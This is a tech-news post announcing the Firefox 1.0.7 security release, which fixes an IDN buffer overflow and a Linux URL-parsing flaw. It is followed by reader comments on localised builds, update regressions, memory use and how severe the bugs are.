Firefox 1.0.7 Released
hackajar writes "Firefox 1.0.7 has been released today. From the announcement: 'Fixes are included for the international domain name (IDN) link buffer overflow vulnerability and the Linux command line URL parsing flaw. There are also other security and stability changes, including a fix for a crash experienced when using certain Proxy Auto-Config scripts. In addition, some regressions introduced by previous 1.0.x security updates have been resolved.'"
That perfectly fits with yesterday's news about the Mozilla Foundation being more reactive to security fixes than M$.
And yet again, users of localised builds were left in the cold.
Think about your grandpa, who doesn't know English. He can't use a non-translated build and is left with a vulnerable, older version.
Good work, Firefox developers!
:wq
The unix/linux bad-link problem allowing malicious URLs to run shell scripts is a bit nasty. Maybe Symantec wasn't entirely blowing smoke the other day with their warnings about Firefox not really being that much more secure than IE. The patches come out faster, but there sure are some nasty bugs in there yet.
Ok, I'm a geek and all, but this week I just installed 1.5 Beta 1 - so is it now vuln to this, whereas 1.0.7 is not? I understand branches, tags and such, but after a while this could really confuse joe_user. Is anyone trying out the new Opera since it's now free? I've only tried the Win version, but darnit, it's very nice. Tonight I'll try it on Ubuntu, after updating FF to 1.0.7 of course (I don't run dev software at home, else I'll hear about it crashing from my wife! ;))
bad_outlook
--
Is this vague enough for you?
Too many regressions caused by security updates, and people will turn off auto-update. That's the very reason that Microsoft moved to a monthly update cycle. Getting updates out quickly is important, but unless the security hole is being actively exploited, it's probably more important to make sure nothing else gets broken by the fix. If you convince people not to install updates, then you're in really big trouble.
Whoever corrects a mocker invites insult;
whoever rebukes a wicked man incurs abuse.
--Proverbs 9:7
Now will it stop using anywhere from 73,788 K to 253,000 K RAM? I thought Firefox was supposed to be small and efficient, but that's the RAM usage reported by Task Manager.
C:\>
Heh, a list of many complex actions involving different user IDs, directories and other computer "magic" as seen from a user's perspective, followed by:
"The install was as easy as anything packaged by Vise or InstallShield"
Can you please pass some of that crack you seem to be smoking? I'm a big Linux fan, but installing anything, not in the least a user install from Firefox, does not compare with the "double click setup.exe" from Vise or InstallShield.
And before all the fanboys knee-jerk with the security/spyware/virus/whatever-my-linux-kung-fu-is-so-cool-i-kick-your-ass stuff - I know, I use Linux and Firefox. But that still doesn't make it an easy install. The distro install, incidentally, is pretty easy though, so just wait for the vendor updates mmmkay?
People who think they know everything are a great annoyance to those of us who do.
It seems that certain organizations are trying to hype every vulnerability that can be associated with Firefox. From my point of view they'd be ranked like this:
#1. Remote root access that does NOT require human intervention or other app running.
#2. Remote non-root access that does NOT require human intervention or other app running.
#3. Local root access that does NOT require human intervention or other app running.
#4. Local non-root access that does NOT require human intervention or other app running.
#5. Local root access that requires some human interaction or some combination of apps.
#6. Local non-root access that requires some human interaction or some combination of apps (this is where this exploit is)
#7. Remote OS crash
#8. Remote app crash
#9. Local OS crash
#10. Local app crash
This is MY opinion. Get your own opinion. There is no way this exploit is "critical". It's one step above a stupid DoS attack and would NOT affect ANY of my servers.